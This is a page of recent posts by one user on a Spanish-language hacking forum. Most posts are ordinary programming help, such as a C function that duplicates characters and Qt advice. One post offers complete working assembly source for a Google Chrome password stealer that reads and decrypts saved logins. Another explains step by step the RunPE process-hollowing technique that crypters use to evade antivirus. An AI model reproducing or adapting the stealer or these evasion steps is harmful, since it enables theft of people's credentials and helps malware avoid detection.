últimos mensajes de: fary

Mostrar Mensajes
Páginas: 1 ... 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 [64] 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 ... 126

631	Programación / Programación C/C++ / Re: Problema con qt	en: 25 Enero 2016, 15:24 pm
Las imágenes están en la carpeta del proyecto?

632	Foros Generales / Foro Libre / Re: ¿Que teclado utilizan los medicos en España? Me encanta!!	en: 23 Enero 2016, 19:39 pm
El teclado de los médicos es este.

633	Programación / Programación C/C++ / Re: alguien me podria ayudar c++ noob	en: 23 Enero 2016, 15:34 pm
Hola, Esta es tu tarea con lo cual la tienes que hacer tu... ¿Hay alguna parte en el código que no entiendas? Con eso si te puedo ayudar. saludos. PD: Eso es C, no C++.

634	Programación / .NET (C#, VB.NET, ASP) / Re: VisualBasic???? Alguien me puede decir cosas sobre él?	en: 23 Enero 2016, 13:20 pm
En los temas pegados tienes muchas respestas: foro.elhacker.net/programacion_visual_basic/rddddecopilacion_de_enlaces_de_visual_basic-t68352.0.html saludos.

635

Programación / Programación C/C++ / Re: Duplicar un caracter en una cadena

en: 22 Enero 2016, 12:58 pm

Aquí tienes tu solución, intenta usar las etiquetas para poner código, es mucho mas fácil leerlo... :xD

Código

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
void DuplicaLetraEnCadena(char * Cadena, char Letra);
 
int main()
{
    char cadena[255];
    char letra;
 
    printf("Introduce una frase: ");
    fgets(cadena, 255, stdin);
 
    printf("Introduce la letra a duplicar: ");
    scanf("%c",&letra);
 
    DuplicaLetraEnCadena(cadena, letra);
    return 0;
}
 
void DuplicaLetraEnCadena(char * Cadena, char Letra)
{
    int i;
 
    for (i = 0; i < strlen(Cadena); i++)
    {
        if(Cadena[i] == Letra)
        {
            printf("%c%c", Cadena[i], Cadena[i]);
        }else{
            printf("%c", Cadena[i]);
        }
    }
}

saludos.

636

Seguridad Informática / Análisis y Diseño de Malware / [ASM] Stealer Google Chrome.

en: 21 Enero 2016, 08:58 am

Bueno, antes de nada este código se lo quiero dedicar a kub0x, que le gustan los códigos en ensamblador :laugh:

Es un Stealer del navegador Google Chrome, funcional con la última versión.

Código fuente:

Código

; Stealer Google Chrome
; Programado por Juan fary.
; Flat Assembler.
 
format PE Console 4.0
entry start
include 'win32ax.inc'
 
section '.data' data readable writeable
        ruta         db '\Local\Google\Chrome\User Data\Default\Login Data',0
        query        db 'SELECT origin_url, username_value, password_value FROM logins',0
 
        bd           dd ?
        stmt         dd ?
 
        URL          db 'URL: %s',10,13,0
        Usuario      db 'Usuario: %s',10,13,0
        PASS         db 'PASS: %s',10,13,0
 
        struct DATA_BLOB
               cbData   dd ?
               pbData   dd ?
        ends
 
        datain      DATA_BLOB
        dataout     DATA_BLOB
 
        buffer      rb 255
 
        barra       db '-----------------------------------------------------',10,13,0
 
        BufferRuta  rb 512
        APPDATA     db 'APPDATA',0
 
section '.code' code readable executable
start:
        invoke GetEnvironmentVariableA, APPDATA, BufferRuta,512
        invoke lstrcat, BufferRuta, ruta
 
        cinvoke sqlite3_open, BufferRuta, bd
        cmp eax, 0 ; eax = SQLITE_OK
        jne salir
 
        cinvoke sqlite3_prepare_v2, [bd] , query, -1 ,stmt,0
        cmp eax, 0 ; eax = SQLITE_OK
        jne salir
 
    BuclePass:
        cinvoke sqlite3_step, [stmt]
        cmp eax, 100 ; eax = SQLITE_ROW
        jne salir
 
        cinvoke printf,barra
 
        cinvoke sqlite3_column_text , [stmt], 0  ; URL
        cinvoke printf,URL,eax
 
        cinvoke sqlite3_column_text , [stmt], 1  ; USUARIO
        cinvoke printf,Usuario,eax
 
        cinvoke sqlite3_column_text , [stmt], 2  ; Contraseña
 
        mov [datain.pbData], eax
        mov [datain.cbData], 512
 
        invoke CryptUnprotectData , datain, 0, 0, 0, 0, 0, dataout
 
        mov ecx, -1
     BucleNull:
        mov edx, [dataout.pbData]
        inc ecx
 
        cmp byte[edx+ecx],0x08
        jne BucleNull
 
        mov byte[edx+ecx],0
 
        cinvoke printf, PASS, [dataout.pbData]
 
        cinvoke printf,barra
 
        jmp BuclePass
 
        salir:
        cinvoke system,'PAUSE'
        ret
 
section '.idata' import data readable writeable
 
        library  sqlite3, 'sqlite3.dll',\
                 msvcrt, 'msvcrt.dll',\
                 Crypt32, 'Crypt32.dll',\
                 KERNEL32, 'KERNEL32.DLL'
 
        import sqlite3,\
               sqlite3_open, 'sqlite3_open',\
               sqlite3_prepare_v2, 'sqlite3_prepare_v2',\
               sqlite3_column_text, 'sqlite3_column_text',\
               sqlite3_step, 'sqlite3_step'
 
        import msvcrt,\
               printf, 'printf',\
               memcpy,'memcpy',\
               system, 'system'
 
        import Crypt32,\
               CryptUnprotectData, 'CryptUnprotectData'
 
        import KERNEL32,\
               GetEnvironmentVariableA, 'GetEnvironmentVariableA',\
               lstrcat, 'lstrcatA'

saludos.

637	Programación / Programación C/C++ / Re: Programar programa incerrable C++	en: 21 Enero 2016, 06:13 am
Pero Kaxperday... ten en cuenta que los otros procesos son NECESARIOS para que funcione el SO y el lo sabe.

638	Seguridad Informática / Seguridad / Re: Eliminar virus tocapelotas en un PC muy lento	en: 21 Enero 2016, 05:50 am
Ese tipo de virus se suelen eliminar muy bien con el disco de KAV Rescue, descargalo de aquí. Por si no sabes como funciona te diré que, es una ISO, y lo tienes que arrancar desde la BIOS, una vez arrancado escaneas el disco duro con el y ya te digo que este tipo de programas los suele eliminar. PD: si por casualidad consiges el ejecutable no estaría de más que dejaras una muestra por aquí. saludos y ya nos contarás como fue la operación .

639	Seguridad Informática / Análisis y Diseño de Malware / Re: como crear mi propio runpe guias	en: 21 Enero 2016, 05:40 am
@Zerointhewill Cita de: zerointhewill en 20 Enero 2016, 17:15 pm la parte del runpe quiero aprender hacer uno propio . por mi misma cuenta por donde debo empezar , veo que utilizan varias api Se ha explicado en varias ocasiones en el foro, aquí puedes ver una de las descripciones: https://foro.elhacker.net/analisis_y_diseno_de_malware/funcionamiento_de_un_runpe-t362805.0.html Y Aquí te cito una explicación mas técnica por The Swash. Cita de: The Swash en 30 Septiembre 2011, 01:39 am Buena tarde, Con respecto a las respuestas, todas están erradas, pero vamos no del todo y no es por desmeritarles. En realidad el RunPE obviamente tiene estrecha relación con el Formato PE, pero no es exactamente eso. El famoso RunPE es una técnica la cual permite ejecutar archivos ("on the fly" - Karcrack), es decir sin necesidad de que el archivo ocupe tamaño físico, esto se hace porque el archivo está plasmado en un buffer en memoria. Esta técnica es usada en malware generalmente en Cifradores, los cuales tienen en su cuerpo el archivo cifrado, luego en memoria lo descifran y lo ejecutan, y esto no llamará mucho la atención. Como funciona un RunPE: Comprobar que es un ejecutable válido (MZ & PE/x0/x0 Signature). Crear un nuevo proceso suspendido (Generalmente con el mismo ejecutable). Desasignar la proyección del archivo en ese proceso, ImageBase. (Limpiar el ejecutable del proceso). Obtener contextos (Registros). Reservar en memoria la dirección del ImageBase del ejecutable con un tamaño del campo SizeOfImage. (ImageBase y SizeOfImage del archivo a ejecutar). Escribir la cabecera y las secciones alineadas por el campo SectionAlignment. Editar EAX en los registros leídos por la dirección del punto de entrada del archivo a ejecutar. Editar EBX + 8 por el ImageBase del ejecutable a cargar (Cambiar base de la imagen del nuevo proceso). Editar con el nuevo contexto (Escribir registros). Iniciar el proceso suspendido. Un saludo. @Inflamable!!! Cita de: Inflamable!!! en 20 Enero 2016, 19:19 pm ya claro lo dejas indetectado a la hora de analizar y cuando lo ejecutas lo elimina,pero yo la verdad no se por donde empezar,ya anduve echando un ojo,porque la verdad esta bien saber hacerlos tu mismo para no tener que andar pagando y ademas que si te lo dan echo ya no tiene gracia a mi lo que me gustaria seria tener mi codigo para luego modearlo y cada vez que se queme,pero si no pasa ni una proactiva es tonteria. saludos. En realidad esta técnica es ya bastante detectada por los antivirus. La técnica que aquí te voy a dejar debajo, también te sirve como RunPE y es muchísimo mejor ya que no tienes que crear ni desmapear un proceso externo, en desventaja te diré que es un poco más complicada de entender. http://foro.elhacker.net/analisis_y_diseno_de_malware/ejecucion_de_archivos_desde_memoria_base_relocation-t264564.20.html saludos.

640	Programación / Programación General / Re: bug no cerrar procesos en windows 7 32/64	en: 20 Enero 2016, 18:25 pm
Sí.

Páginas: 1 ... 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 [64] 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 ... 126